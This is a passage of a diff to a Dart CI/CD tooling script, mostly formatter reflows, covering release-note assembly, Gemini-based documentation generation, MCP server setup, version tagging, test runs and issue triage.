back to git names', + ); // Fallback: use git display names without usernames final names = (gitResult.stdout as String) .trim() @@ -1028,7 +1115,9 @@ List> _gatherVerifiedContributors(String repoRoot, String pr .where((l) => l.isNotEmpty && !l.contains('[bot]')) .map((l) => l.split(' ').length > 1 ? l.split(' ')[1] : l) .toSet() - .map>((email) => {'username': email.split('@').first}) + .map>( + (email) => {'username': email.split('@').first}, + ) .toList(); return names; } @@ -1056,7 +1145,9 @@ String _postProcessReleaseNotes( contributorsSection.writeln('## Contributors'); contributorsSection.writeln(); if (verifiedContributors.isNotEmpty) { - contributorsSection.writeln('Thanks to everyone who contributed to this release:'); + contributorsSection.writeln( + 'Thanks to everyone who contributed to this release:', + ); for (final c in verifiedContributors) { final username = c['username'] ?? ''; if (username.isNotEmpty) { @@ -1097,16 +1188,25 @@ String _postProcessReleaseNotes( // ── Validate issue references throughout the document ── // Find all (#N) patterns and validate they exist - final issueRefs = RegExp(r'\(#(\d+)\)').allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); + final issueRefs = RegExp( + r'\(#(\d+)\)', + ).allMatches(result).map((m) => int.parse(m.group(1)!)).toSet(); if (issueRefs.isNotEmpty) { - final validIssues = verifiedIssues.map((i) => i['number'] as int? ?? 0).toSet(); + final validIssues = verifiedIssues + .map((i) => i['number'] as int? ?? 0) + .toSet(); final fabricated = issueRefs.difference(validIssues); if (fabricated.isNotEmpty) { - _warn('Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}'); + _warn( + 'Stripping ${fabricated.length} fabricated issue references: ${fabricated.map((n) => "#$n").join(", ")}', + ); for (final issueNum in fabricated) { // Remove the link but keep descriptive text: "[#N](url) — desc" → "desc" - result = result.replaceAll(RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), ''); + result = result.replaceAll( + RegExp(r'- \[#' + issueNum.toString() + r'\]\([^)]*\)[^\n]*\n'), + '', + ); // Remove inline (#N) references result = result.replaceAll('(#$issueNum)', ''); } @@ -1116,7 +1216,11 @@ String _postProcessReleaseNotes( return result; } -String _buildFallbackReleaseNotes(String repoRoot, String version, String prevTag) { +String _buildFallbackReleaseNotes( + String repoRoot, + String version, + String prevTag, +) { final buf = StringBuffer(); buf.writeln('# ${config.repoName} v$version'); buf.writeln(); @@ -1192,7 +1296,9 @@ Future _runAutodoc(String repoRoot, List args) async { if (File(configPath).existsSync()) { _success('autodoc.json exists at $configPath'); } else { - _error('autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json'); + _error( + 'autodoc.json not found. Create it at $kRuntimeCiDir/autodoc.json', + ); } return; } @@ -1240,7 +1346,9 @@ Future _runAutodoc(String repoRoot, List args) async { final generateTypes = (module['generate'] as List).cast(); final libDir = libPaths.isNotEmpty ? '$repoRoot/${libPaths.first}' : ''; - _info(' $id ($name): ${force ? "forced" : "changed"} -> generating ${generateTypes.join(", ")}'); + _info( + ' $id ($name): ${force ? "forced" : "changed"} -> generating ${generateTypes.join(", ")}', + ); if (dryRun) { updatedModules.add(id); @@ -1282,7 +1390,9 @@ Future _runAutodoc(String repoRoot, List args) async { if (dryRun) { _info(''); - _info('[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged'); + _info( + '[DRY-RUN] Would generate docs for ${updatedModules.length} modules, skipped $skippedCount unchanged', + ); for (final id in updatedModules) { _info(' - $id'); } @@ -1296,7 +1406,9 @@ Future _runAutodoc(String repoRoot, List args) async { // Execute in parallel batches _info(''); - _info('Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...'); + _info( + 'Running ${tasks.length} Gemini doc generation tasks (max $maxConcurrent parallel)...', + ); // Simple batching: process maxConcurrent at a time for (var i = 0; i < tasks.length; i += maxConcurrent) { @@ -1305,9 +1417,13 @@ Future _runAutodoc(String repoRoot, List args) async { } // Save updated config with new hashes - File(configPath).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); + File( + configPath, + ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(config)); - _success('Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.'); + _success( + 'Generated docs for ${updatedModules.length} modules, skipped $skippedCount unchanged.', + ); _info('Updated hashes saved to $kRuntimeCiDir/autodoc.json'); _writeStepSummary(''' @@ -1356,9 +1472,13 @@ Future _generateAutodocFile({ // Generate prompt from template final promptArgs = [moduleName, sourceDir]; if (libDir.isNotEmpty) promptArgs.add(libDir); - if (docType == 'migration' && previousHash.isNotEmpty) promptArgs.add(previousHash); + if (docType == 'migration' && previousHash.isNotEmpty) + promptArgs.add(previousHash); - final prompt = _runSync('dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', repoRoot); + final prompt = _runSync( + 'dart run $repoRoot/$templatePath ${promptArgs.map((a) => '"$a"').join(' ')}', + repoRoot, + ); if (prompt.isEmpty) { _warn(' [$moduleId] Empty prompt for $docType, skipping'); @@ -1399,7 +1519,10 @@ Do not skip any -- completeness is more important than brevity. final pass1Result = Process.runSync( 'sh', - ['-c', 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${pass1Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1407,7 +1530,9 @@ Do not skip any -- completeness is more important than brevity. if (pass1Prompt.existsSync()) pass1Prompt.deleteSync(); if (pass1Result.exitCode != 0) { - _warn(' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}'); + _warn( + ' [$moduleId] Pass 1 failed: ${(pass1Result.stderr as String).trim()}', + ); return; } @@ -1488,7 +1613,10 @@ Write the corrected file to the same path: $absOutputFile final pass2Result = Process.runSync( 'sh', - ['-c', 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}'], + [ + '-c', + 'cat ${pass2Prompt.path} | gemini --yolo -m $kGeminiProModel ${includes.join(" ")}', + ], workingDirectory: repoRoot, environment: {...Platform.environment}, ); @@ -1496,7 +1624,9 @@ Write the corrected file to the same path: $absOutputFile if (pass2Prompt.existsSync()) pass2Prompt.deleteSync(); if (pass2Result.exitCode != 0) { - _warn(' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}'); + _warn( + ' [$moduleId] Pass 2 failed (keeping Pass 1 output): ${(pass2Result.stderr as String).trim()}', + ); } // Verify final output @@ -1504,7 +1634,9 @@ Write the corrected file to the same path: $absOutputFile final finalSize = outputFile.lengthSync(); final delta = finalSize - pass1Size; final deltaStr = delta >= 0 ? '+$delta' : '$delta'; - _success(' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)'); + _success( + ' [$moduleId] $outputFileName: $finalSize bytes ($deltaStr from review)', + ); return; } @@ -1550,7 +1682,9 @@ Future _runTriageCli(String repoRoot, List triageArgs) async { if (_dryRun) forwardedArgs.add('--dry-run'); if (_verbose) forwardedArgs.add('--verbose'); - _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}'); + _info( + 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${forwardedArgs.join(" ")}', + ); final result = await Process.run( 'dart', @@ -1597,20 +1731,27 @@ Future _runVersion(String repoRoot) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); _info('Current version (pubspec.yaml): $currentVersion'); _info('Previous tag: $prevTag'); _info('Next version: $newVersion'); // Save version bump rationale if Gemini produced one - final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); + final rationaleFile = File( + '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', + ); if (rationaleFile.existsSync()) { final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; rationaleFile.copySync(targetPath); - _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); + _success( + 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', + ); } } @@ -1623,7 +1764,8 @@ Future _runConfigureMcp(String repoRoot) async { Map settings; try { - settings = json.decode(settingsFile.readAsStringSync()) as Map; + settings = + json.decode(settingsFile.readAsStringSync()) as Map; } catch (e) { _error('Could not read .gemini/settings.json: $e'); exit(1); @@ -1634,13 +1776,22 @@ Future _runConfigureMcp(String repoRoot) async { // GitHub MCP Server final ghToken = - Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN'] ?? Platform.environment['GITHUB_PAT']; + Platform.environment['GH_TOKEN'] ?? + Platform.environment['GITHUB_TOKEN'] ?? + Platform.environment['GITHUB_PAT']; if (ghToken != null && ghToken.isNotEmpty) { _info('Configuring GitHub MCP server...'); mcpServers['github'] = { 'command': 'docker', - 'args': ['run', '-i', '--rm', '-e', 'GITHUB_PERSONAL_ACCESS_TOKEN', 'ghcr.io/github/github-mcp-server'], + 'args': [ + 'run', + '-i', + '--rm', + '-e', + 'GITHUB_PERSONAL_ACCESS_TOKEN', + 'ghcr.io/github/github-mcp-server', + ], 'env': {'GITHUB_PERSONAL_ACCESS_TOKEN': ghToken}, 'includeTools': [ 'get_issue', @@ -1671,14 +1822,18 @@ Future _runConfigureMcp(String repoRoot) async { }; _success('GitHub MCP server configured'); } else { - _warn('No GitHub token found. Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.'); + _warn( + 'No GitHub token found. Set GH_TOKEN or GITHUB_PAT to configure GitHub MCP.', + ); _info(' export GH_TOKEN='); } // Sentry MCP Server (remote, no local install needed) _info('Configuring Sentry MCP server (remote)...'); mcpServers['sentry'] = {'url': 'https://mcp.sentry.dev/mcp'}; - _success('Sentry MCP server configured (uses OAuth -- browser auth on first use)'); + _success( + 'Sentry MCP server configured (uses OAuth -- browser auth on first use)', + ); // Write updated settings settings['mcpServers'] = mcpServers; @@ -1689,7 +1844,9 @@ Future _runConfigureMcp(String repoRoot) async { return; } - settingsFile.writeAsStringSync('${const JsonEncoder.withIndent(' ').convert(settings)}\n'); + settingsFile.writeAsStringSync( + '${const JsonEncoder.withIndent(' ').convert(settings)}\n', + ); _success('Updated .gemini/settings.json with MCP servers'); _info(''); @@ -1718,7 +1875,10 @@ Future _runStatus(String repoRoot) async { _info('Required tools:'); for (final tool in [...kRequiredTools, ...kOptionalTools]) { if (_commandExists(tool)) { - final version = _runSync('$tool --version 2>/dev/null || echo "installed"', repoRoot); + final version = _runSync( + '$tool --version 2>/dev/null || echo "installed"', + repoRoot, + ); _success(' $tool: $version'); } else { _error(' $tool: NOT INSTALLED'); @@ -1729,22 +1889,29 @@ Future _runStatus(String repoRoot) async { _info(''); _info('Environment:'); final geminiKey = Platform.environment['GEMINI_API_KEY']; - _info(' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}'); - final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; + _info( + ' GEMINI_API_KEY: ${geminiKey != null ? "set (${geminiKey.length} chars)" : "NOT SET"}', + ); + final ghToken = + Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; _info(' GitHub token: ${ghToken != null ? "set" : "NOT SET"}'); // Check MCP servers _info(''); _info('MCP servers:'); try { - final settings = json.decode(File('$repoRoot/.gemini/settings.json').readAsStringSync()); + final settings = json.decode( + File('$repoRoot/.gemini/settings.json').readAsStringSync(), + ); final mcpServers = settings['mcpServers'] as Map?; if (mcpServers != null && mcpServers.isNotEmpty) { for (final server in mcpServers.keys) { _success(' $server: configured'); } } else { - _info(' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp'); + _info( + ' No MCP servers configured. Run: dart run runtime_ci_tooling:manage_cicd configure-mcp', + ); } } catch (_) { _info(' Could not read MCP configuration'); @@ -1764,7 +1931,10 @@ Future _runStatus(String repoRoot) async { // Show version info _info(''); - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); final prevTag = _detectPrevTag(repoRoot); _info('Package version: $currentVersion'); _info('Latest tag: $prevTag'); @@ -1785,14 +1955,20 @@ Future _runDetermineVersion(String repoRoot, List args) async { final prevTag = _prevTagOverride ?? _detectPrevTag(repoRoot); final newVersion = _versionOverride ?? _detectNextVersion(repoRoot, prevTag); - final currentVersion = _runSync("awk '/^version:/{print \$2}' pubspec.yaml", repoRoot); + final currentVersion = _runSync( + "awk '/^version:/{print \$2}' pubspec.yaml", + repoRoot, + ); // Determine if we should release var shouldRelease = newVersion != currentVersion; // Safety net: if the tag already exists, skip release regardless if (shouldRelease) { - final tagCheck = Process.runSync('git', ['rev-parse', 'v$newVersion'], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', [ + 'rev-parse', + 'v$newVersion', + ], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _warn('Tag v$newVersion already exists. Skipping release.'); shouldRelease = false; @@ -1806,18 +1982,28 @@ Future _runDetermineVersion(String repoRoot, List args) async { // Save version bump rationale if Gemini produced one if (shouldRelease) { - final rationaleFile = File('$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md'); + final rationaleFile = File( + '$repoRoot/$kCicdRunsDir/version_analysis/version_bump_rationale.md', + ); final bumpDir = Directory('$repoRoot/$kVersionBumpsDir'); bumpDir.createSync(recursive: true); final targetPath = '${bumpDir.path}/v$newVersion.md'; if (rationaleFile.existsSync()) { rationaleFile.copySync(targetPath); - _success('Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md'); + _success( + 'Version bump rationale saved to $kVersionBumpsDir/v$newVersion.md', + ); } else { // Generate basic rationale - final commitCount = _runSync('git rev-list --count "$prevTag"..HEAD 2>/dev/null', repoRoot); - final commits = _runSync('git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', repoRoot); + final commitCount = _runSync( + 'git rev-list --count "$prevTag"..HEAD 2>/dev/null', + repoRoot, + ); + final commits = _runSync( + 'git log "$prevTag"..HEAD --oneline --no-merges 2>/dev/null | head -20', + repoRoot, + ); File(targetPath).writeAsStringSync( '# Version Bump: v$newVersion\n\n' '**Date**: ${DateTime.now().toUtc().toIso8601String()}\n' @@ -1825,7 +2011,9 @@ Future _runDetermineVersion(String repoRoot, List args) async { '**Commits**: $commitCount\n\n' '## Commits\n\n$commits\n', ); - _success('Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md'); + _success( + 'Basic version rationale saved to $kVersionBumpsDir/v$newVersion.md', + ); } } @@ -1868,7 +2056,9 @@ Future _runDetermineVersion(String repoRoot, List args) async { } // Read version bump rationale for summary - final rationaleContent = _readFileOr('$repoRoot/$kVersionBumpsDir/v$newVersion.md'); + final rationaleContent = _readFileOr( + '$repoRoot/$kVersionBumpsDir/v$newVersion.md', + ); _writeStepSummary(''' ## Version Determination @@ -1927,7 +2117,10 @@ Future _runCreateRelease(String repoRoot, List args) async { final pubspecFile = File('$repoRoot/pubspec.yaml'); final pubspecContent = pubspecFile.readAsStringSync(); pubspecFile.writeAsStringSync( - pubspecContent.replaceFirst(RegExp(r'^version: .*', multiLine: true), 'version: $newVersion'), + pubspecContent.replaceFirst( + RegExp(r'^version: .*', multiLine: true), + 'version: $newVersion', + ), ); _info('Bumped pubspec.yaml to version $newVersion'); @@ -1954,13 +2147,14 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - if (foundReleaseNotes != null && foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { + if (foundReleaseNotes != null && + foundReleaseNotes.path != '${releaseDir.path}/release_notes.md') { foundReleaseNotes.copySync('${releaseDir.path}/release_notes.md'); _info('Copied release notes to ${releaseDir.path}/release_notes.md'); } else if (foundReleaseNotes == null) { - File( - '${releaseDir.path}/release_notes.md', - ).writeAsStringSync(_buildFallbackReleaseNotes(repoRoot, newVersion, prevTag)); + File('${releaseDir.path}/release_notes.md').writeAsStringSync( + _buildFallbackReleaseNotes(repoRoot, newVersion, prevTag), + ); _warn('No Stage 3 release notes found -- generated fallback'); } @@ -1984,9 +2178,9 @@ Future _runCreateRelease(String repoRoot, List args) async { // Copy Stage 3 linked issues if it exists, otherwise create minimal final existingLinked = File('${releaseDir.path}/linked_issues.json'); if (!existingLinked.existsSync()) { - File( - '${releaseDir.path}/linked_issues.json', - ).writeAsStringSync('{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}'); + File('${releaseDir.path}/linked_issues.json').writeAsStringSync( + '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"prs_referenced":[]}', + ); } // Copy Stage 3 highlights if it exists @@ -1999,7 +2193,10 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelog = File('$repoRoot/CHANGELOG.md'); if (changelog.existsSync()) { final content = changelog.readAsStringSync(); - final entryMatch = RegExp('## \\[$newVersion\\].*?(?=## \\[|\\Z)', dotAll: true).firstMatch(content); + final entryMatch = RegExp( + '## \\[$newVersion\\].*?(?=## \\[|\\Z)', + dotAll: true, + ).firstMatch(content); File( '${releaseDir.path}/changelog_entry.md', ).writeAsStringSync(entryMatch?.group(0)?.trim() ?? '## [$newVersion]\n'); @@ -2007,7 +2204,9 @@ Future _runCreateRelease(String repoRoot, List args) async { // Contributors: use the single verified source of truth final contribs = _gatherVerifiedContributors(repoRoot, prevTag); - File('${releaseDir.path}/contributors.json').writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); + File( + '${releaseDir.path}/contributors.json', + ).writeAsStringSync(const JsonEncoder.withIndent(' ').convert(contribs)); _success('Release notes assembled in $kReleaseNotesDir/v$newVersion/'); @@ -2019,7 +2218,11 @@ Future _runCreateRelease(String repoRoot, List args) async { // Step 4: Commit all changes _info('Configuring git identity for release commit'); _exec('git', ['config', 'user.name', 'github-actions[bot]'], cwd: repoRoot); - _exec('git', ['config', 'user.email', 'github-actions[bot]@users.noreply.github.com'], cwd: repoRoot); + _exec('git', [ + 'config', + 'user.email', + 'github-actions[bot]@users.noreply.github.com', + ], cwd: repoRoot); // Add files individually — git add is all-or-nothing and will fail the // entire command if any path doesn't exist (e.g., autodoc.json on first @@ -2034,7 +2237,8 @@ Future _runCreateRelease(String repoRoot, List args) async { '$kRuntimeCiDir/autodoc.json', ]; if (Directory('$repoRoot/docs').existsSync()) filesToAdd.add('docs/'); - if (Directory('$repoRoot/$kCicdAuditDir').existsSync()) filesToAdd.add('$kCicdAuditDir/'); + if (Directory('$repoRoot/$kCicdAuditDir').existsSync()) + filesToAdd.add('$kCicdAuditDir/'); _info('Staging ${filesToAdd.length} release artifacts for commit'); for (final path in filesToAdd) { final fullPath = '$repoRoot/$path'; @@ -2043,7 +2247,11 @@ Future _runCreateRelease(String repoRoot, List args) async { } } - final diffResult = Process.runSync('git', ['diff', '--cached', '--quiet'], workingDirectory: repoRoot); + final diffResult = Process.runSync('git', [ + 'diff', + '--cached', + '--quiet', + ], workingDirectory: repoRoot); if (diffResult.exitCode != 0) { // Build a rich, detailed commit message from available artifacts final commitMsg = _buildReleaseCommitMessage( @@ -2055,12 +2263,20 @@ Future _runCreateRelease(String repoRoot, List args) async { // Use a temp file for the commit message to avoid shell escaping issues final commitMsgFile = File('$repoRoot/.git/RELEASE_COMMIT_MSG'); commitMsgFile.writeAsStringSync(commitMsg); - _exec('git', ['commit', '-F', commitMsgFile.path], cwd: repoRoot, fatal: true); + _exec( + 'git', + ['commit', '-F', commitMsgFile.path], + cwd: repoRoot, + fatal: true, + ); commitMsgFile.deleteSync(); // Use GH_TOKEN for push authentication (HTTPS remote) - final ghToken = Platform.environment['GH_TOKEN'] ?? Platform.environment['GITHUB_TOKEN']; - final remoteRepo = Platform.environment['GITHUB_REPOSITORY'] ?? effectiveRepo; + final ghToken = + Platform.environment['GH_TOKEN'] ?? + Platform.environment['GITHUB_TOKEN']; + final remoteRepo = + Platform.environment['GITHUB_REPOSITORY'] ?? effectiveRepo; if (ghToken != null && remoteRepo.isNotEmpty) { _exec('git', [ 'remote', @@ -2076,12 +2292,20 @@ Future _runCreateRelease(String repoRoot, List args) async { } // Step 5: Create git tag (verify it doesn't already exist) - final tagCheck = Process.runSync('git', ['rev-parse', tag], workingDirectory: repoRoot); + final tagCheck = Process.runSync('git', [ + 'rev-parse', + tag, + ], workingDirectory: repoRoot); if (tagCheck.exitCode == 0) { _error('Tag $tag already exists. Cannot create release.'); exit(1); } - _exec('git', ['tag', '-a', tag, '-m', 'Release v$newVersion'], cwd: repoRoot, fatal: true); + _exec( + 'git', + ['tag', '-a', tag, '-m', 'Release v$newVersion'], + cwd: repoRoot, + fatal: true, + ); _exec('git', ['push', 'origin', tag], cwd: repoRoot, fatal: true); _success('Created tag: $tag'); @@ -2098,14 +2322,23 @@ Future _runCreateRelease(String repoRoot, List args) async { final changelogLink = File('$repoRoot/CHANGELOG.md').existsSync() ? ' | [CHANGELOG.md](https://github.com/$effectiveRepo/blob/v$newVersion/CHANGELOG.md)' : ''; - final migrationLink = File('${releaseDir.path}/migration_guide.md').existsSync() + final migrationLink = + File('${releaseDir.path}/migration_guide.md').existsSync() ? ' | [Migration Guide]($kReleaseNotesDir/v$newVersion/migration_guide.md)' : ''; releaseBody += '\n\n---\n[Full Changelog](https://github.com/$effectiveRepo/compare/$prevTag...v$newVersion)' '$changelogLink$migrationLink'; - final ghArgs = ['release', 'create', tag, '--title', 'v$newVersion', '--notes', releaseBody]; + final ghArgs = [ + 'release', + 'create', + tag, + '--title', + 'v$newVersion', + '--notes', + releaseBody, + ]; if (effectiveRepo.isNotEmpty) ghArgs.addAll(['--repo', effectiveRepo]); _exec('gh', ghArgs, cwd: repoRoot); @@ -2159,12 +2392,15 @@ Future _runTest(String repoRoot) async { final testDir = Directory('$repoRoot/test'); if (!testDir.existsSync()) { _success('No test/ directory found — skipping tests'); - _writeStepSummary('## Test Results\n\n**No test/ directory found — skipped.**\n'); + _writeStepSummary( + '## Test Results\n\n**No test/ directory found — skipped.**\n', + ); return; } // Determine log directory: TEST_LOG_DIR (CI) or .dart_tool/test-logs/ (local) - final logDir = Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; + final logDir = + Platform.environment['TEST_LOG_DIR'] ?? '$repoRoot/.dart_tool/test-logs'; Directory(logDir).createSync(recursive: true); final jsonPath = '$logDir/results.json'; @@ -2189,7 +2425,11 @@ Future _runTest(String repoRoot) async { // Use Process.start with piped output so we can both stream to console // AND capture the full output for summary generation. - final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); + final process = await Process.start( + Platform.resolvedExecutable, + testArgs, + workingDirectory: repoRoot, + ); // Stream stdout and stderr to console in real-time while capturing final stdoutBuf = StringBuffer(); @@ -2210,19 +2450,24 @@ Future _runTest(String repoRoot) async { final exitCode = await process.exitCode.timeout( processTimeout, onTimeout: () { - _error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + _error( + 'Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.', + ); process.kill(); // No signal arg — cross-platform safe return -1; }, ); try { - await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); + await Future.wait([ + stdoutDone, + stderrDone, + ]).timeout(const Duration(seconds: 30)); } catch (_) { // Ignore stream errors (e.g. process killed before streams drained) } // Parse the JSON results file for structured test data - final results = parseTestResultsJson(jsonPath); + final results = StepSummary.parseTestResultsJson(jsonPath); // Write console output to log file as well (supplements shell-level tee) File('$logDir/dart_stdout.log').writeAsStringSync(stdoutBuf.toString()); @@ -2231,7 +2476,7 @@ Future _runTest(String repoRoot) async { } // Generate and write the rich job summary - writeTestJobSummary(results, exitCode, logDir); + StepSummary.writeTestJobSummary(results, exitCode); if (exitCode != 0) { _error('Tests failed (exit code $exitCode)'); @@ -2247,15 +2492,26 @@ Future _runTest(String repoRoot) async { /// protobuf code, which are expected and must not block CI. Future _runAnalyze(String repoRoot) async { _header('Running Analysis'); - final result = await Process.run('dart', ['analyze'], workingDirectory: repoRoot); + final result = await Process.run('dart', [ + 'analyze', + ], workingDirectory: repoRoot); final output = (result.stdout as String); stdout.write(output); stderr.write(result.stderr); // Count severity levels in output - final errorCount = RegExp(r'^\s*error\s+-\s+', multiLine: true).allMatches(output).length; - final warningCount = RegExp(r'^\s*warning\s+-\s+', multiLine: true).allMatches(output).length; - final infoCount = RegExp(r'^\s*info\s+-\s+', multiLine: true).allMatches(output).length; + final errorCount = RegExp( + r'^\s*error\s+-\s+', + multiLine: true, + ).allMatches(output).length; + final warningCount = RegExp( + r'^\s*warning\s+-\s+', + multiLine: true, + ).allMatches(output).length; + final infoCount = RegExp( + r'^\s*info\s+-\s+', + multiLine: true, + ).allMatches(output).length; _info(' Errors: $errorCount, Warnings: $warningCount, Infos: $infoCount'); @@ -2316,7 +2572,11 @@ Future _runVerifyProtos(String repoRoot) async { final protoDir = Directory('$repoRoot/proto/src'); var protoCount = 0; if (protoDir.existsSync()) { - protoCount = protoDir.listSync(recursive: true).whereType().where((f) => f.path.endsWith('.proto')).length; + protoCount = protoDir + .listSync(recursive: true) + .whereType() + .where((f) => f.path.endsWith('.proto')) + .length; } _info('Proto source files in proto/src/: $protoCount'); @@ -2329,7 +2589,12 @@ Future _runVerifyProtos(String repoRoot) async { final libDir = Directory('$repoRoot/lib'); var generatedCount = 0; if (libDir.existsSync()) { - final extensions = ['.pb.dart', '.pbenum.dart', '.pbjson.dart', '.pbgrpc.dart']; + final extensions = [ + '.pb.dart', + '.pbenum.dart', + '.pbjson.dart', + '.pbgrpc.dart', + ]; generatedCount = libDir .listSync(recursive: true) .whereType() @@ -2343,7 +2608,9 @@ Future _runVerifyProtos(String repoRoot) async { exit(1); } - _success('Proto verification passed: $protoCount sources, $generatedCount generated'); + _success( + 'Proto verification passed: $protoCount sources, $generatedCount generated', + ); } /// Run documentation update via Gemini. @@ -2366,7 +2633,10 @@ Future _runDocumentation(String repoRoot) async { _error('Prompt script not found: $docScript'); exit(1); } - final prompt = _runSync('dart run $docScript "$prevTag" "$newVersion"', repoRoot); + final prompt = _runSync( + 'dart run $docScript "$prevTag" "$newVersion"', + repoRoot, + ); if (prompt.isEmpty) { _error('Documentation prompt generator produced empty output.'); exit(1); @@ -2374,7 +2644,9 @@ Future _runDocumentation(String repoRoot) async { ctx.savePrompt('documentation', prompt); if (_dryRun) { - _info('[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)'); + _info( + '[DRY-RUN] Would run Gemini for documentation update (${prompt.length} chars)', + ); return; } @@ -2384,7 +2656,9 @@ Future _runDocumentation(String repoRoot) async { final includes = []; if (File('/tmp/commit_analysis.json').existsSync()) { includes.add('@/tmp/commit_analysis.json'); - } else if (File('$repoRoot/$kCicdRunsDir/explore/commit_analysis.json').existsSync()) { + } else if (File( + '$repoRoot/$kCicdRunsDir/explore/commit_analysis.json', + ).existsSync()) { includes.add('@$repoRoot/$kCicdRunsDir/explore/commit_analysis.json'); } includes.add('@README.md'); @@ -2430,17 +2704,33 @@ Future _runPreReleaseTriage(String repoRoot, List args) async { if (!_geminiAvailable(warnOnly: true)) { _warn('Producing empty issue manifest (Gemini unavailable).'); final ctx = RunContext.create(repoRoot, 'pre-release-triage'); - final emptyManifest = '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; - ctx.saveArtifact('pre-release-triage', 'issue_manifest.json', emptyManifest); - _success('Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json'); + final emptyManifest = + '{"version":"$newVersion","github_issues":[],"sentry_issues":[],"cross_repo_issues":[]}'; + ctx.saveArtifact( + 'pre-release-triage', + 'issue_manifest.json', + emptyManifest, + ); + _success( + 'Empty manifest saved to ${ctx.runDir}/pre-release-triage/issue_manifest.json', + ); ctx.finalize(exitCode: 0); return; } - final triageArgs = ['--pre-release', '--prev-tag', prevTag, '--version', newVersion, '--force']; + final triageArgs = [ + '--pre-release', + '--prev-tag', + prevTag, + '--version', + newVersion, + '--force', + ]; if (_verbose) triageArgs.add('--verbose'); - _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); + _info( + 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', + ); final result = await Process.run( 'dart', @@ -2490,7 +2780,9 @@ Future _runPostReleaseTriage(String repoRoot, List args) async { ]; if (_verbose) triageArgs.add('--verbose'); - _info('Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}'); + _info( + 'Delegating to triage CLI: dart run runtime_ci_tooling:triage_cli ${triageArgs.join(" ")}', + ); final result = await Process.run( 'dart', @@ -2535,7 +2827,9 @@ Future _runArchiveRun(String repoRoot, List args) async { runDirPath = RunContext.findLatestRun(repoRoot); if (runDirPath == null) { _warn('No $kCicdRunsDir/ directory found — nothing to archive.'); - _info('This is expected if audit trail artifacts were not transferred between jobs.'); + _info( + 'This is expected if audit trail artifacts were not transferred between jobs.', + ); return; } _info('Using latest run: $runDirPath'); @@ -2572,7 +2866,9 @@ Future _runMergeAuditTrails(String repoRoot, List args) async { if (args[i] == '--output-dir') outputDir = args[i + 1]; } - final incomingPath = incomingDir.startsWith('/') ? incomingDir : '$repoRoot/$incomingDir'; + final incomingPath = incomingDir.startsWith('/') + ? incomingDir + : '$repoRoot/$incomingDir'; final incoming = Directory(incomingPath); if 